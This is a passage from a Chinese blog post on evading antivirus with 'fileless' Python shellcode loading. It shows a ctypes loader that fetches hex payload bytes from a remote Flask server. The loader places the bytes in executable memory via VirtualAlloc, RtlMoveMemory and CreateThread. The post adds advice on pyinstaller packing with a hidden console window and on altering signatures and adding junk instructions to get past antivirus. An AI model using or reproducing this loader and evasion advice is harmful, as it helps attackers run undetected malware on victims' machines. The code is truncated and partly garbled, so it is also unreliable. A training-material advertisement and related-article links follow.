Python shellcode免杀无文件落地_文件不落地免杀(1)

于 2024-05-13 02:41:43 发布
阅读量120 收藏
点赞数 2
分类专栏: 程序员 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84970989/article/details/138776804
版权 
print(type(hex_values))

hex_list = hex_values

# 获取最后一个元素
last_element = hex_list[-1]
# 替换不正常的字符
new_last_element = last_element.replace('\"\r\n', '')
# 将替换后的元素放回列表
hex_list[-1] = new_last_element

# 将十六进制字符串列表转换为十六进制字符串
hex_string = "".join(hex_list)
hex_string = hex_string.rstrip('"')

print(type(hex_string))
print(hex_string)

# 将十六进制字符串转换为字节数组
byte_array = bytearray.fromhex(hex_string)
print(byte_array)
print(type(byte_array))

shellcode = byte_array
# VirtualAlloc函数用来开辟内存空间,返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

# RtlMoveMemory函数将Shellcode加载至此段内存空间
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)

# 使用CreateThread函数创建一个线程从Shellcode的起始地址开始执行此段内存空间的内容
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)

# 通过WaitForSingleObject函数来等待执行结束
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

else:
print(‘Failed to retrieve file:’, response.status_code)



服务器端存payload:


![](https://img-blog.csdnimg.cn/direct/a4a8d596924947298af7236fd24fd5d3.png)


服务器后端:


(需安装flask框架)

#服务器:
from flask import Flask, send_file
app = Flask(name)
@app.route(‘/hello.txt’)
def hello():
return send_file(‘hello.txt’)
if name == ‘main’:
app.run(host=‘0.0.0.0’, port=80)


使用pyinstaller打包客户端。记得去掉Dos黑窗口


运行能过大部分杀软。


可是某数字杀软已经过不了。这很正常。某数字杀软本身宁错杀勿放过,其次人家有智慧云大脑,这玩意只要被查出来就会上传云上,之后就不免杀。


你可以尝试改改特征,换个打包工具。把代码添加花指令。再隐藏一些特征。应该还是可以有时过掉比较难过的杀软。别人的免杀永远仅供参考 别自己原封不动地去用。

## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/10f2f9dc26d20f3f557a5a8d158efccb.png)

![img](https://img-blog.csdnimg.cn/img_convert/7d3f598c7bb0e54835fdf4564798fbe0.png)

![img](https://img-blog.csdnimg.cn/img_convert/1547888bb8bfc7dada9a4056b27f134b.png)

![img](https://img-blog.csdnimg.cn/img_convert/75d4428b6b95fb81934ea4a578b906b7.png)

![img](https://img-blog.csdnimg.cn/img_convert/ffce81d67f0c09361551f47c7846419d.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84970989
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
样本分析报告——RevengeRAT无文件落地攻击
摔不死的笨鸟的博客
11-17 885
该样本出现在2019年9月6日,样本分析报告在2019年9月16日。样本来源于国外沙箱app.any.run。 样本信息 FileName FileType FileSize MD5 Order____679873892.xls RevengeRAT变种 41,472 bytes 7641fef8abc7cb24b66655d11ef3daf2 样本行为 样本启动后会有启动宏功能的安全提示。 启用宏之后,提示运行时错误,提示标题为Microsoft Visual Basic,由此可以
Python shellcode免杀文件落地
qq_43658820的博客
04-23 405
总结:python免杀在我个人看来已经不推荐了。pyinstaller打包特征过于明显,python本身是高级解释性语言,没有c的底层api 你用Virtual alloc分配内存也特别明显,编译后的exe文件极其容易被查出特征。尽管有时可以过一些杀软,考虑性价比 仍然不推荐用python。你可以尝试改改特征,换个打包工具。应该还是可以有时过掉比较难过的杀软。某数字杀软本身宁错杀勿放过,其次人家有智慧云大脑,这玩意只要被查出来就会上传云上,之后就不免杀。使用pyinstaller打包客户端。
文件落地免杀的初尝试思考(上)
wjwqp的专栏
07-23 621
我们通过BarrettAdams师傅GitHub里面的代码分析,我们发现免杀的本质还是加密与混淆;我们通过底层函数的调用与"位图"的RNG隐藏躲避了def检测,那我们把这个数据流在进行Base64加密后执行呢?我们把这个数字流通过”+“或者函数拼接呢?又或者我们改用其他不那么敏感的函数调用呢?或者用音频或者视频隐写呢?因为笔者也是初次尝试无文件落地免杀,所以难免有一些疏漏。如果存在问题,欢迎大家在评论区指正。作者面包and牛奶,文章转载于FreeBuf.COMhttpshttpshttps。...
浅谈无文件落地攻击
errorr0
06-04 2245
文件落地攻击实现隐藏攻击
免杀对抗-无文件落地&分离拆分-文本提取+加载器分离+参数协议化+图片隐写
xiaoheizi的博客
09-24 1352
文件落地&分离拆分其实就是内存免杀,内存免杀是将shellcode直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。为了使内存免杀的效果更好,在申请内存时一般采用渐进式申请一块可读写内存,在运行时改为可执行,在执行的时候遵循分离免杀的思想。分离免杀包含对特征和行为的分离两个维度,把shellcode从放在程序转移到加载进内存,把整块的shellcode通过分块传输的方法上传然后再拼接,这些体现了基本的”分离“思想。3.因为实战的时候不需要加密,所以就代码中的加密代码剔除,减少特征。
文件落地攻击
Fly_鹏程万里
11-10 1105
所谓的"无文件落地攻击"是指恶意程序文件不直接落地到目标系统的磁盘空间中的一种攻击手法,常用于逃避传统的安全检测机制,本篇文章将就此进行简要介绍几种目前比较流行的无文件落地攻击手法。
2024HW --> 安全产品 && Powershell文件落地攻击
huohaowen的博客
04-14 1268
在HW中,除了了解中间件,web漏洞,这些攻击的手法,还得了解应急响应,安全产品,入侵排查,溯源反制...... 那么今天,就来说一下安全产品(安全公司我就不说了,这个大家都知道)
利用WinRM实现内网无文件落地攻击
UKK
06-18 860
利用WinRM实现内网无文件落地攻击 http://www.ifind.cc/view/220
2024年最全【免杀】分离免杀python)_shellcode loader免杀,2024年最新面试应该准备些什么材料
最新发布
2401_84538063的博客
05-10 400
① 2000多本Python电子书(主流和经典的书籍应该都有了)② Python标准库资料(最全中文版)③ 项目源码(四五十个有趣且经典的练手项目及源码)④ Python基础入门、爬虫、web开发、大数据分析方面的视频(适合小白学习)⑤ Python学习路线图(告别不入流的学习)
5.15更新!免杀绕过Defender、360
潇湘信安的博客
07-18 2201
python3写的这个免杀工具,其原理是利用windows提供的API运行指定程序,然后修改其内存数据,将目标进程“掏空”替换成恶意的木马程序以达到隐蔽和免杀的目的。
TideSec远控免杀学习一(免杀基础+msfvenom隐藏的参数)
fa1lr4in的小博客
02-08 2651
参考链接:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 参考资料 免杀技术有一套:https://anhkgg.com/aanti-virus/ Meterpreter免杀及对抗分析:https://www.freebuf.com/sectool/157122.html 免杀艺术:https://www.4hou.com/technol...
简单的免杀流程,软件使用方法与一点思路(Cobalt-strike)
weixin_74182283的博客
04-04 1645
字面意思,就是恶意软件或者木马,通过对其进行修改,导致杀毒软件扫描时会默认这款恶意软件是个安全的软件,导致恶意软件成功上传到电脑。通常在渗透测试的过程中,想要进入别人内网,就需要通过一些木马或者一些程序上传至别人内网,从而得到对方内网的权限。正常情况下,linux内可能没啥杀毒软件,但windows系统下的杀毒软件就各种各样,而我们的木马刚传上去就会被杀掉,这时如果懂得如何去对上传的马做一个免杀,使其顺利通过防火墙就显得非常重要了。
关于木马免杀的一些方法
oiadkt的博客
04-27 1338
关于木马免杀的一些方法
内网渗透-常用工具免杀
jklbnm12的博客
08-25 1450
内网渗透-常用工具免杀 Mimikatz免杀 Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证、票证传递、hash传递、甚至伪造域管理凭证令牌等诸多功能。由于mimikatz的使用说明网上资料很多,这里就不多加介绍了,随着这两年hw行动越来越多,企事业单位也都开始注重内网安全,有预算的会上全套的终端安全、企业版杀软或者EDR,就算没有预算的也会装个360全家桶或者主机卫士之类的,这也导致很多时候你的mimikatz可能都没法拷贝过去或者没有加载执行,拿了台服务器却横向移不动就尴尬了。因为这款工
免杀常用技术方法
whatday的专栏
04-23 7067
00. 概述 什么是免杀?来自百科的注解: 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。 有本比较有名的书,想详细学习的同学可以去看看。《黑客免杀攻防》 其实我大概好像只看过目录…( ╯□╰ ) 下面我介绍的是自己实践的一些方法,有没...
shell 免杀aspx_对于asp免杀webshell的一些总结
weixin_31235909的博客
12-31 627
0x00 前言现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp的免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章偷偷介绍下公众号:404安全0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有:VBScriptASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//ASP的执行函数 :...
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 1244
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
一次另类的mssql渗透之路
include_voidmain的博客
06-08 496
一次另类的mssql渗透之路
python渗透测试入门之shellcode
ailx10
06-26 1041
近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第21个实验( shellcode),我的测试环境是windows10虚拟机(32位)+kali虚拟机+conda开发环境+python3.7+MSF框架。过程有点曲折,因为是32位windows环境,因为之前实验导致自己电脑坏了,我从vitualbox虚拟机更换成了vmware虚拟机,顺利完成本次实...
python shellcode免杀
06-06
Python shellcode免杀是指使用Python语言编写的shellcode可以避免被杀毒软件检测和拦截。这种技术主要是通过对shellcode进行加密、混淆、动态生成等方式来达到免杀的效果。其中,加密和混淆可以使shellcode的代码难以被静态分析,动态生成则可以避免被动态检测。此外,还可以使用反射注入等技术来绕过杀毒软件的检测。总之,Python shellcode免杀技术是一种比较高级的安全技术,需要有一定的编程和安全知识才能实现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值